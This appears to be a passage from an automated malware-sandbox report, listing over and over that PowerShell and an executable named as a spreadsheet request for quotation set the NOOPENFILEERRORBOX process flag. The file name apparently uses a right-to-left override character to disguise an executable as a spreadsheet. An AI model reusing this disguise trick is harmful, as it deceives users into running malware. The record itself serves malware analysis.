                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
